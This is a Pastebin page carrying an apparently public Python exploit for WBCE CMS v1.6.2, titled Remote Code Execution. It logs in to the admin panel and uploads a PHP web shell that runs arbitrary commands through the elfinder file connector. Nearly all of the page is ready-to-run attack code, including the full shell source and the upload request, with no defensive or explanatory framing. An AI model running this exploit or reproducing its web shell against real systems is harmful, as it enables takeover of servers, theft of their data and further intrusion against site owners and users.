Advertisement
FlyFar

WBCE CMS v1.6.2 - Remote Code Execution (RCE)

Jun 24th, 2024
470
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.34 KB | Cybersecurity | 0 0
  1. # Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)
  2. # Date: 3/5/2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://wbce-cms.org/
  5. # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip
  6. # Version: 1.6.2
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. from bs4 import BeautifulSoup
  11. import sys
  12. import time
  13.  
  14. def login(url, username, password):
  15. print("Logging in...")
  16. time.sleep(3)
  17. with requests.Session() as session:
  18. response = session.get(url + "/admin/login/index.php")
  19. soup = BeautifulSoup(response.text, 'html.parser')
  20. form = soup.find('form', attrs={'name': 'login'})
  21. form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in
  22. form.find_all('input') if input_tag.get('type') != 'submit'}
  23. # Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle
  24. form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =
  25. username
  26. form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =
  27. password
  28. post_response = session.post(url + "/admin/login/index.php", data=form_data)
  29. if "Administration" in post_response.text:
  30. print("Login successful!")
  31. time.sleep(3)
  32. return session
  33. else:
  34. print("Login failed.")
  35. print("Headers received:", post_response.headers)
  36. print("Response content:", post_response.text[:500]) # İlk 500 karakter
  37. return None
  38.  
  39. def upload_file(session, url):
  40. # Dosya içeriğini ve adını belirleyin
  41. print("Shell preparing...")
  42. time.sleep(3)
  43. files = {'upload[]': ('shell.inc',"""<html>
  44. <body>
  45. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  46. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  47. <input type="SUBMIT" value="Execute">
  48. </form>
  49. <pre>
  50. <?php
  51. if(isset($_GET['cmd']))
  52. {
  53. system($_GET['cmd']);
  54. }
  55. ?>
  56. </pre>
  57. </body>
  58. </html>""", 'application/octet-stream')}
  59. data = {
  60. 'reqid': '18f3a5c13d42c5',
  61. 'cmd': 'upload',
  62. 'target': 'l1_Lw',
  63. 'mtime[]': '1714669495'
  64. }
  65. response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",
  66. files=files, data=data)
  67. if response.status_code == 200:
  68. print("Your Shell is Ready: " + url + "/media/shell.inc")
  69. else:
  70. print("Failed to upload file.")
  71. print(response.text)
  72.  
  73. if __name__ == "__main__":
  74. url = sys.argv[1]
  75. username = sys.argv[2]
  76. password = sys.argv[3]
  77. session = login(url, username, password)
  78. if session:
  79. upload_file(session, url)
  80.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement